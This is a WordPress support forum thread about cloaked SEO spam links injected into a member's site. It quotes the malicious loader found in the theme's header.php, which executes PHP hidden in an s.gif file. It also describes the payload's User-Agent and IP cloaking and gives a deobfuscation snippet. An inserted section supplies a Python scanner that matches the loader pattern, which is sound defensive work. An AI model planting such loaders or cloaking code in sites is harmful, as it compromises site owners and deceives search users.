
[resolved] Stealth Link Injection (18 posts)

  1. omatan
    Member
    Posted 2 years ago #

    My site (http://seattlerueda.com) has been injected with links that are only visible to search engines - clearly for SERP improvement. See image from Google's cache:

    http://seattlerueda.com/sr-link-injection.jpg

    The hack is clever in that when I use agent switcher in my browser the version sent to the browser has none of the links. Since I cannot recreate it, it's hard to track it down through the code. I am running 3.3.2.

    Has anyone heard of/seen this and have ideas about where to find the rogue code?

    Thanks,

    -Ofer

  2. adpawl
    Member
    Posted 2 years ago #

    You might want to go and ask these guys for help - http://sucuri.net/
    They do this for a fee, but I'm sure they can help.

    Otherwise, their blog might have some info.

  4. esmi
    Forum Moderator
    Posted 2 years ago #

    That's an interesting one - especially as sucuri.net's scan isn't picking it up. It might be worth contacting them about it.

    unmaskparasites.com, however, did find the links: Scan result

  5. omatan
    Member
    Posted 2 years ago #

    @adpawl - I've seen these posts - I am looking for leads to identify this particular problem. Clearly I can try rebuilding, but that would be my last resort.

    @esmi - thanks for the reference to unmaskparasites.com - didn't know of that resource.

    My main concern is being able to replicate the links on my browser - if I could do that I am certain I could identify where the breach is.

  6. My main concern is being able to replicate the links on my browser - if I could do that I am certain I could identify where the breach is.

    Try putting this into the browser:

    site:seattlerueda.com viagra

    https://www.google.ca/search?q=site%3Aseattlerueda.com+viagra&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

  7. adpawl
    Member
    Posted 2 years ago #

    I cannot reproduce this problem in my browser, but Google's cache helps.

    Links are inserted before <div id="main">.
    Look first in your header.php.
    Try checking your files by modification time.

  8. omatan
    Member
    Posted 2 years ago #

    @zooini - this isn't the pharma hack.

    adpawl - the problem is I wanted to recreate it in my browser off the code, so I can trace how it occurs by turning things off.
    Seeing it in the Google cache is useful to see where it occurs, but it doesn't help me pinpoint which plugin or template or core area is affected. I did, however, look in the header of my theme and found what is likely the problem:

    <?php $wp__theme_icon=@create_function('',@file_get_contents('...../s.gif'));$wp__theme_icon(); ?>

    The s.gif file was some masked PHP code. I can't test if that totally solved it, but will wait till there is a new Google cache.

    Thanks.
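    An added example, not posted in this thread: a small Python triage scanner that combines the two leads above, the loader line omatan found in header.php (create_function over file_get_contents of a .gif) and adpawl's suggestion to check files by modification time. The directory layout, the sample files and the /tmp/s.gif path are constructed for the demo.

```python
import re
import tempfile
import time
from pathlib import Path

# Constructed indicator based on the line found in the theme header: a non-PHP
# file (e.g. a .gif) read with file_get_contents and fed to create_function/eval.
SUSPICIOUS = re.compile(
    r"(create_function|eval)\s*\(.*?file_get_contents\s*\(\s*['\"][^'\"]*"
    r"\.(gif|jpe?g|png|ico|txt)['\"]",
    re.IGNORECASE | re.DOTALL,
)


def scan_tree(root, newer_than=None):
    """Walk a WordPress install and return [(relative_path, mtime)] for PHP
    files matching the loader pattern. If newer_than (epoch seconds) is given,
    only files modified after that moment are examined, which is the cheap
    'check by modification time' triage suggested in the thread."""
    hits = []
    for path in Path(root).rglob("*.php"):
        mtime = path.stat().st_mtime
        if newer_than is not None and mtime <= newer_than:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        if SUSPICIOUS.search(text):
            hits.append((str(path.relative_to(root)), mtime))
    # Most recently modified first: injected files tend to be the newest ones.
    return sorted(hits, key=lambda h: h[1], reverse=True)


def build_sample_install():
    """Constructed sample install: one clean theme file and a header.php that
    carries a loader shaped like the one quoted in the thread."""
    root = tempfile.mkdtemp()
    theme = Path(root, "wp-content", "themes", "mytheme")
    theme.mkdir(parents=True)
    (theme / "footer.php").write_text("<?php wp_footer(); ?>\n")
    (theme / "header.php").write_text(
        "<?php $wp__theme_icon=@create_function('',"
        "@file_get_contents('/tmp/s.gif'));$wp__theme_icon(); ?>\n"
    )
    return root


if __name__ == "__main__":
    sample_root = build_sample_install()
    for rel, mtime in scan_tree(sample_root):
        print(time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime)), rel)
```

    Run it against a real install as scan_tree("/path/to/wordpress", newer_than=<epoch of last known-good backup>) and review every hit by hand; the pattern is a triage aid, not proof of compromise.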

  9. adpawl
    Member
    Posted 2 years ago #

    @omatan, can you add code of this file to a service like Pastebin (pastebin.com, wordpress.pastebin.ca) then add your link to the post? Or send this file to my mail adpawl.it [ AT ] gmail.com ?

  10. MickeyRoush
    Member
    Posted 2 years ago #

    @ omatan

    First go to your site in Firefox. Then see if you can view generated source. I have so many web developer add-ons for Firefox, I'm not sure if it's in the default Firefox install or not. But it will show more than just view source, especially if a site is hacked.

    Second, go download freefilesync:
    http://sourceforge.net/projects/freefilesync/

    It will allow you to compare fresh themes/plugins/core against your current install. It will tell you which files have different content/attributes. Then use a tool like WinMerge or KDiff to see the differences within each file specifically.

  11. omatan
    Member
    Posted 2 years ago #

    @adpawl - here it is : http://pastebin.com/Gztx7pSg

  12. adpawl
    Member
    Posted 2 years ago #

    It's your real code: http://pastebin.com/GdYfk4XJ ;-)

  13. adpawl
    Member
    Posted 2 years ago #

    This means that what is checked is the User-Agent and the IP range: http://pastebin.com/gZerFJPF

  14. omatan
    Member
    Posted 2 years ago #

    Thanks. Sneaky devils. That confirms what I suspected, that IP addresses were checked, exactly to fool you if you used an agent switcher.

    What tool do you use to decode the PHP source?

  15. adpawl
    Member
    Posted 2 years ago #

    I use only my head.
    ...well, maybe also n++ and PHP, of course ;-p

  16. omatan
    Member
    Posted 2 years ago #

    I don't understand. How do you get from the masked code http://pastebin.com/Gztx7pSg to "real code" : http://pastebin.com/GdYfk4XJ

  17. adpawl
    Member
    Posted 2 years ago #

    It's magic!
    - joke :)

    Analysis and appropriate modification of the code.
    It is enough to apply:
    echo preg_replace("{$giNuGYt}".'/','$2$1',$o3m9n6V($L5tsc7));
